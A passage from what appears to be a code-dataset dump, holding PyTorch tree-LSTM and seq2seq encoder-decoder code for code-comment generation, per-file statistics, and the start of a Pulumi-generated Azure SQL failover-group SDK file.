self.in_dim = in_dim
self.mem_dim = mem_dim
self.gate_output = gate_output
def new_gate():
lh = nn.Linear(self.mem_dim, self.mem_dim)
rh = nn.Linear(self.mem_dim, self.mem_dim)
return lh, rh
self.ilh, self.irh = new_gate()
self.lflh, self.lfrh = new_gate()
self.rflh, self.rfrh = new_gate()
self.ulh, self.urh = new_gate()
if self.cudaFlag:
self.ilh = self.ilh.cuda()
self.irh = self.irh.cuda()
self.lflh = self.lflh.cuda()
self.lfrh = self.lfrh.cuda()
self.rflh = self.rflh.cuda()
self.rfrh = self.rfrh.cuda()
self.ulh = self.ulh.cuda()
self.urh = self.urh.cuda()
if self.gate_output:
self.olh, self.orh = new_gate()
if self.cudaFlag:
self.olh = self.olh.cuda()
self.orh = self.orh.cuda()
def forward(self, lc, lh , rc, rh):
i = F.sigmoid(self.ilh(lh) + self.irh(rh))
lf = F.sigmoid(self.lflh(lh) + self.lfrh(rh))
rf = F.sigmoid(self.rflh(lh) + self.rfrh(rh))
update = F.tanh(self.ulh(lh) + self.urh(rh))
c = i* update + lf*lc + rf*rc
if self.gate_output:
o = F.sigmoid(self.olh(lh) + self.orh(rh))
h = o*F.tanh(c)
else:
h = F.tanh(c)
return c, h
class TreeEncoder_W2V(nn.Module):
def __init__(self, opt, dicts):
super(TreeEncoder_W2V, self).__init__()
self.layers = opt.layers
self.opt = opt
self.dicts = dicts
self.num_directions = 2 if opt.brnn else 1
assert opt.rnn_size % self.num_directions == 0
self.hidden_size = opt.rnn_size // self.num_directions
self.embeddings = gensim.models.Word2Vec.load(opt.embedding_w2v + 'processed_all.train_xe.code.gz')
# self.embeddings = Embeddings(opt, dicts)
self.input_size = self.opt.word_vec_size #self.embeddings.embedding_size #100
if len(self.opt.gpus) >= 1:
self.cudaFlag = True
else:
self.cudaFlag = False
self.leaf_module = BinaryTreeLeafModule(self.cudaFlag, self.input_size, self.hidden_size)
self.composer = BinaryTreeComposer(self.cudaFlag, self.input_size, self.hidden_size)
def forward(self, tree, lengths):
if not tree.children:
try:
node = torch.Tensor(self.embeddings.wv[tree.content]).unsqueeze(0)
except:
node = torch.zeros(1, self.input_size)
if self.cudaFlag:
node = node.cuda()
# node = self.embeddings(Variable(torch.LongTensor([self.dicts.lookup(tree.content, onmt.Constants.UNK)]).unsqueeze(1)).cuda())
# node.data.squeeze_(1)
# print "node: ", node.size()
# print node
# output, state = self.leaf_module.forward(Variable(node, requires_grad=True))
output, state = self.leaf_module.forward(node.requires_grad_(True))
elif tree.children:
# for idx in xrange(tree.num_children):
lo, (lc, lh) = self.forward(tree.children[0], lengths)
ro, (rc, rh) = self.forward(tree.children[1], lengths)
# lc, lh, lo, rc, rh, ro = self.get_child_state(tree)
state = self.composer.forward(lc, lh, rc, rh)
output = torch.cat([lo, ro])
# del lc, lh, lo, rc, rh, ro
if not tree.parent:
# max_length = int(torch.max(lengths.data))
max_length = np.max(lengths)
output.data.unsqueeze_(1)
supl = max_length - output.size()[0]
if supl > 0:
output.data = torch.cat([output.data, torch.zeros((supl, output.size()[1], output.size()[2])).cuda()], 0)
state[0].data.unsqueeze_(1)
state[1].data.unsqueeze_(1)
return output, state
# def get_child_state(self, tree):
# lc, lh = tree.children[0].state
# lo = tree.children[0].output
# rc, rh = tree.children[1].state
# ro = tree.children[1].output
# return lc, lh, lo, rc, rh, ro
class TreeEncoder(nn.Module):
def __init__(self, opt, dicts):
super(TreeEncoder, self).__init__()
self.layers = opt.layers
self.opt = opt
self.dicts = dicts
self.num_directions = 2 if opt.brnn else 1
assert opt.rnn_size % self.num_directions == 0
self.hidden_size = opt.rnn_size // self.num_directions
# self.embeddings = gensim.models.Word2Vec.load(opt.embedding_w2v + 'processed_all.train_xe.code.gz')
self.word_lut = nn.Embedding(dicts.size(), opt.word_vec_size, padding_idx=lib.Constants.PAD)
self.input_size = self.opt.word_vec_size #self.embeddings.embedding_size #100
if len(self.opt.gpus) >= 1:
self.cudaFlag = True
else:
self.cudaFlag = False
self.leaf_module = BinaryTreeLeafModule(self.cudaFlag, self.input_size, self.hidden_size)
self.composer = BinaryTreeComposer(self.cudaFlag, self.input_size, self.hidden_size)
def forward(self, tree, lengths):
if not tree.children:
# try:
# node = torch.Tensor(self.embeddings.wv[tree.content]).unsqueeze(0)
# except:
# node = torch.zeros(1, self.input_size)
# if self.cudaFlag:
# node = node.cuda()
# node = self.word_lut(Variable(torch.LongTensor([self.dicts.lookup(tree.content, lib.Constants.UNK)])).cuda())
node = self.word_lut(
torch.LongTensor([self.dicts.lookup(tree.content, lib.Constants.UNK)]).cuda())
output, state = self.leaf_module.forward(node) # Variable(node, requires_grad=True)
elif tree.children:
# for idx in xrange(tree.num_children):
lo, (lc, lh) = self.forward(tree.children[0], lengths)
ro, (rc, rh) = self.forward(tree.children[1], lengths)
# lc, lh, lo, rc, rh, ro = self.get_child_state(tree)
state = self.composer.forward(lc, lh, rc, rh)
output = torch.cat([lo, ro])
# del lc, lh, lo, rc, rh, ro
if not tree.parent:
# max_length = int(torch.max(lengths.data))
max_length = np.max(lengths)
output.data.unsqueeze_(1)
supl = max_length - output.size()[0]
if supl > 0:
output.data = torch.cat([output.data, torch.zeros((supl, output.size()[1], output.size()[2])).cuda()], 0)
state[0].data.unsqueeze_(1)
state[1].data.unsqueeze_(1)
return output, state
# def get_child_state(self, tree):
# lc, lh = tree.children[0].state
# lo = tree.children[0].output
# rc, rh = tree.children[1].state
# ro = tree.children[1].output
# return lc, lh, lo, rc, rh, ro
class HybridEncoder(nn.Module):
def __init__(self, opt, dicts):
super(HybridEncoder, self).__init__()
self.layers = opt.layers
self.opt = opt
self.dicts = dicts
self.num_directions = 2 if opt.brnn else 1
assert opt.rnn_size % self.num_directions == 0
self.hidden_size = opt.rnn_size // self.num_directions
# self.embeddings = gensim.models.Word2Vec.load(opt.embedding_w2v + 'processed_all.train_xe.code.gz')
self.word_lut = nn.Embedding(dicts.size(), opt.word_vec_size, padding_idx=lib.Constants.PAD)
self.input_size = self.opt.word_vec_size #self.embeddings.embedding_size #100
if len(self.opt.gpus) >= 1:
self.cudaFlag = True
else:
self.cudaFlag = False
self.leaf_module = BinaryTreeLeafModule(self.cudaFlag, self.input_size, self.hidden_size)
self.composer = BinaryTreeComposer(self.cudaFlag, self.input_size, self.hidden_size)
def forward(self, tree, lengths):
if not tree.children:
# node = self.word_lut(Variable(torch.LongTensor([self.dicts.lookup(tree.content, lib.Constants.UNK)])).cuda())
node = self.word_lut(
torch.LongTensor([self.dicts.lookup(tree.content, lib.Constants.UNK)]).cuda())
output, state = self.leaf_module.forward(node) # Variable(node, requires_grad=True)
elif tree.children:
# for idx in xrange(tree.num_children):
lo, (lc, lh) = self.forward(tree.children[0], lengths)
ro, (rc, rh) = self.forward(tree.children[1], lengths)
# lc, lh, lo, rc, rh, ro = self.get_child_state(tree)
state = self.composer.forward(lc, lh, rc, rh)
output = torch.cat([lo, ro])
# del lc, lh, lo, rc, rh, ro
if not tree.parent:
# max_length = int(torch.max(lengths.data))
max_length = np.max(lengths)
output.data.unsqueeze_(1)
supl = max_length - output.size()[0]
if supl > 0:
output.data = torch.cat([output.data, torch.zeros((supl, output.size()[1], output.size()[2])).cuda()], 0)
state[0].data.unsqueeze_(1)
state[1].data.unsqueeze_(1)
return output, state
class TreeDecoder_W2V(nn.Module):
def __init__(self, opt, dicts):
self.layers = opt.layers
self.input_feed = opt.input_feed
input_size = opt.word_vec_size
if self.input_feed:
input_size += opt.rnn_size
super(TreeDecoder_W2V, self).__init__()
# self.word_lut = nn.Embedding(dicts.size(), opt.word_vec_size, padding_idx=lib.Constants.PAD)
self.embeddings = gensim.models.Word2Vec.load(opt.embedding_w2v + 'processed_all.train_xe.comment.gz')
self.rnn = StackedLSTM(opt.layers, input_size, opt.rnn_size, opt.dropout)
if opt.has_attn:
self.attn = lib.GlobalAttention(opt.rnn_size)
self.dropout = nn.Dropout(opt.dropout)
self.hidden_size = opt.rnn_size
self.opt = opt
self.dicts = dicts
def embedding(self, input):
# print "emb-input: "
# print input
emb = []
for i in range(input.shape[0]):
emb_row = []
for w in self.dicts.convertToLabels(input[i].tolist(), lib.Constants.UNK_WORD):
try:
emb_row.append(self.embeddings.wv[w].astype(float))
except:
emb_row.append(np.zeros((self.opt.word_vec_size), dtype=float))
emb.append(emb_row)
emb = torch.Tensor(emb)
if self.opt.gpus:
emb = emb.cuda()
# print "decoder-emb: "
# print emb
return emb
def step(self, emb, output, hidden, context):
if self.input_feed:
emb = torch.cat([emb, output], 1)
output, hidden = self.rnn(emb, hidden)
# print "decoder-output: "
# print output
# print "decoder-context: "
# print context
if self.opt.has_attn:
output, attn = self.attn(output, context)
output = self.dropout(output)
return output, hidden
def forward(self, inputs, init_states):
emb, output, hidden, context = init_states
# print "decoder-inputs: "
# print inputs
# embs = self.word_lut(inputs)
# print "decoder-embs: "
# print embs
input = inputs.data.cpu().numpy()
embs = self.embedding(input)
outputs = []
for i in range(inputs.size(0)):
output, hidden = self.step(emb, output, hidden, context)
outputs.append(output)
emb = embs[i]
outputs = torch.stack(outputs)
return outputs
class TreeDecoder(nn.Module):
def __init__(self, opt, dicts):
self.layers = opt.layers
self.input_feed = opt.input_feed
input_size = opt.word_vec_size
if self.input_feed:
input_size += opt.rnn_size
super(TreeDecoder, self).__init__()
self.word_lut = nn.Embedding(dicts.size(), opt.word_vec_size, padding_idx=lib.Constants.PAD)
self.rnn = StackedLSTM(opt.layers, input_size, opt.rnn_size, opt.dropout)
if opt.has_attn:
self.attn = lib.GlobalAttention(opt.rnn_size)
self.dropout = nn.Dropout(opt.dropout)
self.hidden_size = opt.rnn_size
self.opt = opt
def step(self, emb, output, hidden, context):
if self.input_feed:
emb = torch.cat([emb, output], 1)
output, hidden = self.rnn(emb, hidden)
if self.opt.has_attn:
output, attn = self.attn(output, context)
output = self.dropout(output)
return output, hidden
def forward(self, inputs, init_states):
emb, output, hidden, context = init_states
embs = self.word_lut(inputs)
outputs = []
for i in range(inputs.size(0)):
output, hidden = self.step(emb, output, hidden, context)
outputs.append(output)
emb = embs[i]
outputs = torch.stack(outputs)
return outputs
class HybridDecoder(nn.Module):
def __init__(self, opt, dicts):
self.layers = opt.layers
self.input_feed = opt.input_feed
input_size = opt.word_vec_size
if self.input_feed:
input_size += opt.rnn_size
super(HybridDecoder, self).__init__()
self.word_lut = nn.Embedding(dicts.size(), opt.word_vec_size, padding_idx=lib.Constants.PAD)
self.rnn = StackedLSTM(opt.layers, input_size, opt.rnn_size, opt.dropout)
if opt.has_attn:
# self.text_attn = lib.GlobalAttention(opt.rnn_size)
self.attn = lib.HybridAttention(opt.rnn_size)
else:
self.linear_out = nn.Linear(opt.rnn_size * 2, opt.rnn_size, bias=False)
self.dropout = nn.Dropout(opt.dropout)
self.hidden_size = opt.rnn_size
self.opt = opt
def step(self, emb, output, hidden_tree, context_tree, hidden_txt, context_txt):
if self.input_feed:
emb = torch.cat([emb, output], 1)
output_tree, hidden_tree = self.rnn(emb, hidden_tree)
output_txt, hidden_txt = self.rnn(emb, hidden_txt)
if self.opt.has_attn:
output, attn_tree, attn_txt = self.attn(output_tree, context_tree, output_txt, context_txt)
else:
output = self.linear_out(torch.cat((output_tree, output_txt), 1))
output = self.dropout(output)
return output, hidden_tree, hidden_txt
def forward(self, inputs, init_states):
emb, output, hidden_tree, context_tree, hidden_txt, context_txt = init_states
embs = self.word_lut(inputs)
outputs = []
for i in range(inputs.size(0)):
output, hidden_tree, hidden_txt = self.step(emb, output, hidden_tree, context_tree, hidden_txt, context_txt)
outputs.append(output)
emb = embs[i]
outputs = torch.stack(outputs)
return outputs
class Hybrid2SeqModel(nn.Module):
def __init__(self, code_encoder, text_encoder, decoder, generator, opt):
super(Hybrid2SeqModel, self).__init__()
self.code_encoder = code_encoder
self.text_encoder = text_encoder
self.decoder = decoder
self.generator = generator
self.opt = opt
def make_init_decoder_output(self, context):
batch_size = context.size(1)
h_size = (batch_size, self.decoder.hidden_size)
# return Variable(context.data.new(*h_size).zero_(), requires_grad=False)
return torch.zeros(*h_size, dtype=context.data.dtype, requires_grad=False)
def initialize(self, inputs, eval):
tgt = inputs[2]
trees = inputs[1][0]
lengths = inputs[1][1]
src_txt = inputs[0]
enc_context_padded_tree, enc_hidden_tree0, enc_hidden_tree1 = [], [], []
# code encoder
for i, tree in enumerate(trees):
enc_ctx_txt, enc_hidden_tree = self.code_encoder(tree, lengths) # enc_contex <=> outputs
enc_context_padded_tree.append(enc_ctx_txt)
enc_hidden_tree0.append(enc_hidden_tree[0])
enc_hidden_tree1.append(enc_hidden_tree[1])
enc_context_padded_tree = torch.cat(enc_context_padded_tree, 1)
enc_hidden_tree = (torch.cat(enc_hidden_tree0, 1), torch.cat(enc_hidden_tree1, 1))
enc_hidden_txt, enc_context_txt = self.text_encoder(src_txt)
init_output = self.make_init_decoder_output(enc_context_txt)
# init_token = Variable(torch.LongTensor([lib.Constants.BOS] * init_output.size(0)), volatile=eval)
init_token = torch.LongTensor([lib.Constants.BOS] * init_output.size(0))
if self.opt.cuda:
init_token = init_token.cuda()
emb = self.decoder.word_lut(init_token)
return tgt, (emb, init_output, enc_hidden_tree, enc_context_padded_tree.transpose(0, 1), enc_hidden_txt, enc_context_txt.transpose(0,1))
def forward(self, inputs, eval, regression=False):
targets, init_states = self.initialize(inputs, eval)
outputs = self.decoder(targets, init_states)
if regression:
logits = self.generator(outputs)
return logits.view_as(targets)
return outputs
def backward(self, outputs, targets, weights, normalizer, criterion, regression=False):
grad_output, loss = self.generator.backward(outputs, targets, weights, normalizer, criterion, regression)
outputs.backward(grad_output)
return loss
def predict(self, outputs, targets, weights, criterion):
return self.generator.predict(outputs, targets, weights, criterion)
def translate(self, inputs, max_length):
targets, init_states = self.initialize(inputs, eval=True)
# emb, output, hidden, context = init_states
emb, output, hidden_tree, context_tree, hidden_txt, context_txt = init_states
preds = []
batch_size = targets.size(1)
num_eos = targets[0].data.byte().new(batch_size).zero_()
for i in range(max_length):
# output, hidden = self.decoder.step(emb, output, hidden, context)
output, hidden_tree, hidden_txt = self.decoder.step(emb, output, hidden_tree, context_tree, hidden_txt, context_txt)
logit = self.generator(output)
pred = logit.max(1)[1].view(-1).data
preds.append(pred)
# Stop if all sentences reach EOS.
num_eos |= (pred == lib.Constants.EOS)
if num_eos.sum() == batch_size: break
# emb = self.decoder.word_lut(Variable(pred))
emb = self.decoder.word_lut(pred)
preds = torch.stack(preds)
return preds
def sample(self, inputs, max_length):
targets, init_states = self.initialize(inputs, eval=False)
emb, output, hidden_tree, context_tree, hidden_txt, context_txt = init_states
outputs = []
samples = []
batch_size = targets.size(1)
num_eos = targets[0].data.byte().new(batch_size).zero_()
for i in range(max_length):
# output, hidden = self.decoder.step(emb, output, hidden, context)
output, hidden_tree, hidden_txt = self.decoder.step(emb, output, hidden_tree, context_tree, hidden_txt, context_txt)
outputs.append(output)
dist = F.softmax(self.generator(output))
sample = dist.multinomial(1, replacement=False).view(-1).data
samples.append(sample)
# Stop if all sentences reach EOS.
num_eos |= (sample == lib.Constants.EOS)
if num_eos.sum() == batch_size: break
# emb = self.decoder.word_lut(Variable(sample))
emb = self.decoder.word_lut(sample)
outputs = torch.stack(outputs)
samples = torch.stack(samples)
return samples, outputs
class Tree2SeqModel(nn.Module):
def __init__(self, encoder, decoder, generator, opt):
super(Tree2SeqModel, self).__init__()
self.encoder = encoder
self.decoder = decoder
self.generator = generator
self.opt = opt
def make_init_decoder_output(self, context):
batch_size = context.size(1)
h_size = (batch_size, self.decoder.hidden_size)
# return Variable(context.data.new(*h_size).zero_(), requires_grad=False)
return torch.zeros(*h_size, dtype=context.data.dtype, requires_grad=False)
def _fix_enc_hidden(self, h):
# the encoder hidden is (layers*directions) x batch x dim
# we need to convert it to layers x batch x (directions*dim)
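# worked example with layers=2 and 2 directions, i.e. h of shape (4, batch, dim):
#   view      -> (2, 2, batch, dim)
#   transpose -> (2, batch, 2, dim)
#   view      -> (2, batch, 2*dim)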
if self.encoder.num_directions == 2:
return h.view(h.size(0) // 2, 2, h.size(1), h.size(2)) \
.transpose(1, 2).contiguous() \
.view(h.size(0) // 2, h.size(1), h.size(2) * 2)
else:
return h
def initialize(self, inputs, eval):
# src = inputs[2]
tgt = inputs[2]
# trees = inputs[4][0]
# lengths = inputs[4][1]
trees = inputs[1][0]
lengths = inputs[1][1]
# lengths = [tree.leaf_count() for tree in trees]
enc_context_padded, enc_hidden0, enc_hidden1 = [], [], []
# print "tree_lengths: ", lengths
for i, tree in enumerate(trees):# encoding trees ONE BY ONE
enc_ctx, enc_hidden = self.encoder(tree, lengths) # enc_contex <=> outputs
enc_context_padded.append(enc_ctx)
enc_hidden0.append(enc_hidden[0])
enc_hidden1.append(enc_hidden[1])
# print "enc_context_padded: "
# print enc_context_padded
enc_context_padded = torch.cat(enc_context_padded, 1)
enc_hidden = (torch.cat(enc_hidden0, 1), torch.cat(enc_hidden1, 1))
init_output = self.make_init_decoder_output(enc_context_padded)
enc_hidden = (self._fix_enc_hidden(enc_hidden[0]), self._fix_enc_hidden(enc_hidden[1]))
# init_token = Variable(torch.LongTensor([lib.Constants.BOS] * init_output.size(0)), volatile=eval)
init_token = torch.LongTensor([lib.Constants.BOS] * init_output.size(0))
if self.opt.cuda:
init_token = init_token.cuda()
emb = self.decoder.word_lut(init_token)
return tgt, (emb, init_output, enc_hidden, enc_context_padded.transpose(0, 1))
def forward(self, inputs, eval, regression=False):
targets, init_states = self.initialize(inputs, eval)
outputs = self.decoder(targets, init_states)
if regression:
logits = self.generator(outputs)
return logits.view_as(targets)
return outputs
def backward(self, outputs, targets, weights, normalizer, criterion, regression=False):
grad_output, loss = self.generator.backward(outputs, targets, weights, normalizer, criterion, regression)
outputs.backward(grad_output)
return loss
def predict(self, outputs, targets, weights, criterion):
return self.generator.predict(outputs, targets, weights, criterion)
def translate(self, inputs, max_length):
targets, init_states = self.initialize(inputs, eval=True)
emb, output, hidden, context = init_states
preds = []
batch_size = targets.size(1)
num_eos = targets[0].data.byte().new(batch_size).zero_()
for i in range(max_length):
output, hidden = self.decoder.step(emb, output, hidden, context)
logit = self.generator(output)
pred = logit.max(1)[1].view(-1).data
preds.append(pred)
# Stop if all sentences reach EOS.
num_eos |= (pred == lib.Constants.EOS)
if num_eos.sum() == batch_size: break
# emb = self.decoder.word_lut(Variable(pred))
emb = self.decoder.word_lut(pred)
preds = torch.stack(preds)
return preds
def sample(self, inputs, max_length):
targets, init_states = self.initialize(inputs, eval=False)
emb, output, hidden, context = init_states
outputs = []
samples = []
batch_size = targets.size(1)
num_eos = targets[0].data.byte().new(batch_size).zero_()
for i in range(max_length):
output, hidden = self.decoder.step(emb, output, hidden, context)
outputs.append(output)
dist = F.softmax(self.generator(output))
sample = dist.multinomial(1, replacement=False).view(-1).data
samples.append(sample)
# Stop if all sentences reach EOS.
num_eos |= (sample == lib.Constants.EOS)
if num_eos.sum() == batch_size: break
# emb = self.decoder.word_lut(Variable(sample))
emb = self.decoder.word_lut(sample)
outputs = torch.stack(outputs)
samples = torch.stack(samples)
return samples, outputs
class Seq2SeqModel(nn.Module):
def __init__(self, encoder, decoder, generator, opt):
super(Seq2SeqModel, self).__init__()
self.encoder = encoder
self.decoder = decoder
self.generator = generator
self.opt = opt
def make_init_decoder_output(self, context):
batch_size = context.size(1)
h_size = (batch_size, self.decoder.hidden_size)
# return Variable(context.data.new(*h_size).zero_(), requires_grad=False)
return torch.zeros(*h_size, dtype=context.data.dtype, requires_grad=False)
def _fix_enc_hidden(self, h):
# the encoder hidden is (layers*directions) x batch x dim
# we need to convert it to layers x batch x (directions*dim)
if self.encoder.num_directions == 2:
return h.view(h.size(0) // 2, 2, h.size(1), h.size(2)) \
.transpose(1, 2).contiguous() \
.view(h.size(0) // 2, h.size(1), h.size(2) * 2)
else:
return h
def initialize(self, inputs, eval):
src = inputs[0]
tgt = inputs[2]
enc_hidden, context = self.encoder(src)
init_output = self.make_init_decoder_output(context)
enc_hidden = (self._fix_enc_hidden(enc_hidden[0]), self._fix_enc_hidden(enc_hidden[1]))
# init_token = Variable(torch.LongTensor([lib.Constants.BOS] * init_output.size(0)), volatile=eval)
init_token = torch.LongTensor([lib.Constants.BOS] * init_output.size(0))
if self.opt.cuda:
init_output = init_output.cuda()
init_token = init_token.cuda()
emb = self.decoder.word_lut(init_token)
return tgt, (emb, init_output, enc_hidden, context.transpose(0, 1))
def forward(self, inputs, eval, regression=False):
targets, init_states = self.initialize(inputs, eval)
outputs = self.decoder(targets, init_states)
if regression:
logits = self.generator(outputs)
return logits.view_as(targets)
return outputs
def backward(self, outputs, targets, weights, normalizer, criterion, regression=False):
grad_output, loss = self.generator.backward(outputs, targets, weights, normalizer, criterion, regression)
outputs.backward(grad_output)
return loss
def predict(self, outputs, targets, weights, criterion):
return self.generator.predict(outputs, targets, weights, criterion)
def translate(self, inputs, max_length):
targets, init_states = self.initialize(inputs, eval=True)
emb, output, hidden, context = init_states
preds = []
batch_size = targets.size(1)
num_eos = targets[0].data.byte().new(batch_size).zero_()
if self.opt.predict_mask:
            block_src = torch.tensor([-np.inf] * batch_size, dtype=torch.float32).view(-1, 1)
block_mask = torch.zeros(batch_size, self.decoder.word_lut.num_embeddings, dtype=torch.float32)
if self.opt.cuda:
block_src = block_src.cuda()
block_mask = block_mask.cuda()
block_mask[:, lib.Constants.UNK] = -np.inf
for i in range(max_length):
output, hidden = self.decoder.step(emb, output, hidden, context)
logit = self.generator(output)
if self.opt.predict_mask: # block repetitive words (except BOS, EOS) and UNK
logit += block_mask
pred = logit.max(1)[1].view(-1).data
# update mask
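                # scatter_ below writes -inf into each row at the column of the token
                # just predicted, so that token cannot be produced again by that
                # sentence; BOS and EOS are re-zeroed so decoding can still terminate.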
block_mask.scatter_(1, pred.view(-1, 1), block_src)
block_mask[:, lib.Constants.BOS] = 0.0
block_mask[:, lib.Constants.EOS] = 0.0
else:
pred = logit.max(1)[1].view(-1).data
preds.append(pred)
num_eos |= (pred == lib.Constants.EOS)
if num_eos.sum() == batch_size: break
# emb = self.decoder.word_lut(Variable(pred))
emb = self.decoder.word_lut(pred)
preds = torch.stack(preds)
return preds
def sample(self, inputs, max_length):
targets, init_states = self.initialize(inputs, eval=False)
emb, output, hidden, context = init_states
outputs = []
samples = []
batch_size = targets.size(1)
num_eos = targets[0].data.byte().new(batch_size).zero_()
for i in range(max_length):
output, hidden = self.decoder.step(emb, output, hidden, context)
outputs.append(output)
logit = self.generator(output)
dist = F.softmax(logit, dim=-1)
sample = dist.multinomial(1, replacement=False).view(-1).data
samples.append(sample)
# Stop if all sentences reach EOS.
num_eos |= (sample == lib.Constants.EOS)
if num_eos.sum() == batch_size: break
# emb = self.decoder.word_lut(Variable(sample))
emb = self.decoder.word_lut(sample)
# emb = self.decoder.embedding(sample.unsqueeze(1).cpu().numpy()).squeeze(1)
outputs = torch.stack(outputs)
samples = torch.stack(samples)
return samples, outputs
| 39.782258
| 144
| 0.605861
| 4,464
| 34,531
| 4.510529
| 0.058692
| 0.023839
| 0.012416
| 0.01182
| 0.824385
| 0.808393
| 0.79116
| 0.781723
| 0.768165
| 0.753464
| 0
| 0.010617
| 0.277142
| 34,531
| 867
| 145
| 39.828143
| 0.796042
| 0.12302
| 0
| 0.747218
| 0
| 0
| 0.003082
| 0.003082
| 0
| 0
| 0
| 0
| 0.007949
| 1
| 0.085851
| false
| 0
| 0.017488
| 0.004769
| 0.197138
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b5033db29996672c083ed0202c7201efb9159b24
| 30,443
|
py
|
Python
|
sdk/python/pulumi_azure/sql/failover_group.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 109
|
2018-06-18T00:19:44.000Z
|
2022-02-20T05:32:57.000Z
|
sdk/python/pulumi_azure/sql/failover_group.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 663
|
2018-06-18T21:08:46.000Z
|
2022-03-31T20:10:11.000Z
|
sdk/python/pulumi_azure/sql/failover_group.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 41
|
2018-07-19T22:37:38.000Z
|
2022-03-14T10:56:26.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['FailoverGroupArgs', 'FailoverGroup']
@pulumi.input_type
class FailoverGroupArgs:
def __init__(__self__, *,
partner_servers: pulumi.Input[Sequence[pulumi.Input['FailoverGroupPartnerServerArgs']]],
read_write_endpoint_failover_policy: pulumi.Input['FailoverGroupReadWriteEndpointFailoverPolicyArgs'],
resource_group_name: pulumi.Input[str],
server_name: pulumi.Input[str],
databases: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
name: Optional[pulumi.Input[str]] = None,
readonly_endpoint_failover_policy: Optional[pulumi.Input['FailoverGroupReadonlyEndpointFailoverPolicyArgs']] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
The set of arguments for constructing a FailoverGroup resource.
:param pulumi.Input[Sequence[pulumi.Input['FailoverGroupPartnerServerArgs']]] partner_servers: A list of secondary servers as documented below
:param pulumi.Input['FailoverGroupReadWriteEndpointFailoverPolicyArgs'] read_write_endpoint_failover_policy: A read/write policy as documented below
:param pulumi.Input[str] resource_group_name: The name of the resource group containing the SQL server
:param pulumi.Input[str] server_name: The name of the primary SQL server. Changing this forces a new resource to be created.
:param pulumi.Input[Sequence[pulumi.Input[str]]] databases: A list of database ids to add to the failover group
:param pulumi.Input[str] name: The name of the failover group. Changing this forces a new resource to be created.
:param pulumi.Input['FailoverGroupReadonlyEndpointFailoverPolicyArgs'] readonly_endpoint_failover_policy: a read-only policy as documented below
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
pulumi.set(__self__, "partner_servers", partner_servers)
pulumi.set(__self__, "read_write_endpoint_failover_policy", read_write_endpoint_failover_policy)
pulumi.set(__self__, "resource_group_name", resource_group_name)
pulumi.set(__self__, "server_name", server_name)
if databases is not None:
pulumi.set(__self__, "databases", databases)
if name is not None:
pulumi.set(__self__, "name", name)
if readonly_endpoint_failover_policy is not None:
pulumi.set(__self__, "readonly_endpoint_failover_policy", readonly_endpoint_failover_policy)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter(name="partnerServers")
def partner_servers(self) -> pulumi.Input[Sequence[pulumi.Input['FailoverGroupPartnerServerArgs']]]:
"""
A list of secondary servers as documented below
"""
return pulumi.get(self, "partner_servers")
@partner_servers.setter
def partner_servers(self, value: pulumi.Input[Sequence[pulumi.Input['FailoverGroupPartnerServerArgs']]]):
pulumi.set(self, "partner_servers", value)
@property
@pulumi.getter(name="readWriteEndpointFailoverPolicy")
def read_write_endpoint_failover_policy(self) -> pulumi.Input['FailoverGroupReadWriteEndpointFailoverPolicyArgs']:
"""
A read/write policy as documented below
"""
return pulumi.get(self, "read_write_endpoint_failover_policy")
@read_write_endpoint_failover_policy.setter
def read_write_endpoint_failover_policy(self, value: pulumi.Input['FailoverGroupReadWriteEndpointFailoverPolicyArgs']):
pulumi.set(self, "read_write_endpoint_failover_policy", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the resource group containing the SQL server
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="serverName")
def server_name(self) -> pulumi.Input[str]:
"""
The name of the primary SQL server. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "server_name")
@server_name.setter
def server_name(self, value: pulumi.Input[str]):
pulumi.set(self, "server_name", value)
@property
@pulumi.getter
def databases(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of database ids to add to the failover group
"""
return pulumi.get(self, "databases")
@databases.setter
def databases(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "databases", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the failover group. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="readonlyEndpointFailoverPolicy")
def readonly_endpoint_failover_policy(self) -> Optional[pulumi.Input['FailoverGroupReadonlyEndpointFailoverPolicyArgs']]:
"""
a read-only policy as documented below
"""
return pulumi.get(self, "readonly_endpoint_failover_policy")
@readonly_endpoint_failover_policy.setter
def readonly_endpoint_failover_policy(self, value: Optional[pulumi.Input['FailoverGroupReadonlyEndpointFailoverPolicyArgs']]):
pulumi.set(self, "readonly_endpoint_failover_policy", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
@tags.setter
